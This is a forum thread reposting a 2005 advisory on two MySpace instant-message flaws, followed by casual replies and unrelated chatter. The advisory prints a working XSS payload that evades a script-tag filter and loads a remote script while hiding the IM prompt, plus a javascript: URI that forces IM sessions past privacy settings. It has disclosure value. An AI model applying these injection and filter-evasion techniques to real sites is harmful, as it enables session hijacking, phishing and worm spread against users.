Happy New Year! Yes, the current one, not a previous one; this is a new post, we swear!
0 Members and 2 Guests are viewing this topic.
Critical Myspace Vulnerabilities Leave Every Active Account ExploitableReported December 5th, 2005Introduction------------In this advisory we will be detailing some very recent holes in the Myspace.com web-application. If you are notfamiliar with Myspace there is much information about the internet phenomenon on the web that will do betterjustice at describing what it is than I can here. Both vulnerabilities lie within the Instant Message (IM) featurefrom within the site. Proper manipulation of both exploits leaves every active account on Myspace potential targets. As displayedby a quite harmless worm Sammy - the seriousness of an effective Myspace hack that would permit nearly unrestrictedaccess to all active accounts should be quite well understood. With this we will be just detailing the vulnerabilitiesand how one might exploit the vulnerabilities without imbedding much of the politics and opinions that could go with it.At the time of this write up one of the exploits has been patched by Myspace (the first - and more serious - one) whereasno action has been taken to fix the other reported vulnerability. The information is to be used to derive the seriousnessof the issue and to add to the general information base of web-application security holes for developer reference.Vulnerability 1: XSS/Script Injection Vulnerability in MySpace IM Webapplication--------------------------------------------------------------------------------Upon an IM request - a javascript command is appended to every requested page on myspace.com that will cause aprompt to appear asking if the user would wish the accept/reject the IM request from the other user. The appendedscript appears at the bottom of the HTML and is much like the following:<script language="javascript"> <!-- window.parent.up_launchIC( '123456', '123456', 'a', '1', 'http:\/\/profile.myspace.com\/index.cfm?fuseaction=user.viewprofile&friendID=123456&showIM=false', 'F', '21', 'a, a', 'http://x.myspace.com/images/no_pic.gif' ); //--></script>The function up_launchIC comes from the following script which is included on every page on Myspace:http://x.myspace.com/js/functions.jsThe arguments passed to the function up_launchIC(); allows the script to generate a sort of popup that notifies the userof the incoming IM request, who it's from, and allows them to accept/reject the request. Three of these arguments canbe manipulated by the target and are not properly filtered (Display Name, City, and State). An attacker can break out ofthe function using the unfiltered ' character. By properly crafting a malicious Username/City/State combination the attackercan force script execution on the target's browser.This exploit can be automated and only requires that the user be active on myspace.com and logged in - in order forthe exploit to work. The target is not required to visit any special page for this exploit to work since the accept/rejectprompt is injected into every page on the myspace domain. This makes this exploit critical.Instant Messaging can be disabled and hampering the effects of this exploit. However, due to another vulnerabilityin myspace.com that circumvents any of the IM settings (will be outlined in Vulnerability 2), a proper exploit cannotbe protected against by the client.There are a number of exploit restrictions that make the exploit more difficult to develop - but not impossible. The firstis size. There are a total of 150 characters that can be injected and also the exploit must clean up the javascript itbroke out of to not cause any errors. This amount is plenty to inject a remote script which can be of any length using<script src=remote script.js>. The second limitation is filtering. There are active filters that monitor the contentplaced in the fields (filtering out <script etc.). For our needs we need only to circumvent the filters on <script whichcan be done using document.write('<sc','ript'); which breaks up the filtered word. Another filtering limitation applies toonly the name field in which < or > cannot be used. This is not fatal to the exploit - the developer of the exploit justneeds to be aware of such.The following exploit will cause a script to be injected from http://a.bcde.net/fg/h.js. Additionally it will call theup_clearICNotify function which clears the prompt (passing the attacker's Friend ID) so the exploit executes without anynotification to the target.[Exploit For Vulnerability #1]Create an account with the following information in the account display fields and then request an IM with a user:NAME/CITY/STATE:',1);up_clearICNotify('12345678');var x='.bcde';('');document.write('<s','cript src=http://a',x);('''');document.write('.net/fg/h.js></s','cript>');('This vulnerability is patched by filtering the ' character (the ' character is replaced by .. in Myspace).Vulnerability 2: Force IM Request---------------------------------The IM application doesn't handle the send request function correctly. Normally, if a user was to try to send an IM requestto someone with the feature disabled they will receive an error message stating such. However, if the user was to send a messageto Myspace as if they were ACCEPTING a request supposedly requested by the other party - this isn't verified and the IM requestgoes through. This forged acceptance can be exploited by simple means of calling the up_launchIC function locally and acceptingthe request.[Exploit For Vulnerability #2]While logged into your Myspace account copy+paste the following into your URI field (works for IE and Firefox) and hit enter:javascript:window.parent.up_launchIC( '[ATTACKER FriendID]', '[TARGET FriendID]', 'amanda', '1', 'http:\/\/www.myspace.com\/index.cfm?fuseaction=user.viewProfile&friendID=12999703&Mytoken=20050410024025&showIM=false', 'M', '17', ', ', 'http://n00084.myspace.com/00084/36/34/84744363_s.jpg' );(Replace the [ATTACKER FriendID] with the FriendID of the attacking account and [TARGET FriendID] with the FriendID of the target account)The function for the IM incoming request will be provoked and a prompt will be provided to you. Accept it - and the session will be createdregardless of what privacy settings the target has set for the IM feature.This vulnerability has still not be addressed by Myspace as of today.Ramifications:--------------With properly exploitation of both exploits a script can be injected onto the target within the Myspace domain. This can allow unsuspected,unguided session hijacking, convenient grounds for phishing attacks, and also user tracking (the exploit can be crafted in such a way that itappears on every page and reports what the user is doing and where they are going within Myspace). The depth of the combined vulnerabilitiesprovides much power to the creative exploit writer. The vulnerability could even be waged as a worm much like the Sammy worm, but more effectivein that the vulnerabilities it exploits is far less restricting. Given the general personal nature of Myspace makes this exploit that much moredangerous.We hope the informational approach of this write-up allows the readers to draw a sober insight on the importance and seriousness of web-applicationand social-network security.Justin LavoieSilent Productions
Correct me if I'm wrong, but this sounds like a simple case of Cross-Site Scripting? XSS, no matter how easy to exploit, should not be called "Critical". Btw, this should be on the security forum
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz[17:32:54] * xar sets mode: +o newby[17:32:58] <xar> new rule[17:33:02] <xar> me and newby rule all
Quote from: CrAz3D on June 30, 2008, 10:38:22 amI'd bet that you're currently bloated like a water ballon on a hot summer's day.That analogy doesn't even make sense. Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT.
I'd bet that you're currently bloated like a water ballon on a hot summer's day.
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min[20:21:15] xar: that was funny
Please, please, someone destroy that horrible webpage.
127.0.0.1 www.myspace.com
Quote from: Newby on December 07, 2005, 07:08:43 pmPlease, please, someone destroy that horrible webpage.Someone should create a worm that adds the following entry to your hosts file:Code: [Select]127.0.0.1 www.myspace.com
Na, I can view invisdible files with a program.Also, iago, I know it's not "critical", but I just copied an e-mail I got from mssecnews/bugtraq (not sure which) and copied the title.
Wait, we're talking about Windoze right? cause if someone put a rootkit on my Slack box, I'd have to reformat.
Quote from: deadly7 on December 07, 2005, 08:12:30 pmWait, we're talking about Windoze right? cause if someone put a rootkit on my Slack box, I'd have to reformat. I'm unaware of any super-threatening *NIX rootkits, but I'm sure they exist.And yes, I was talking about windows. Duh. I'd like to see the ratio of windows users:linux users on MySpace. I bet its close to 1. :]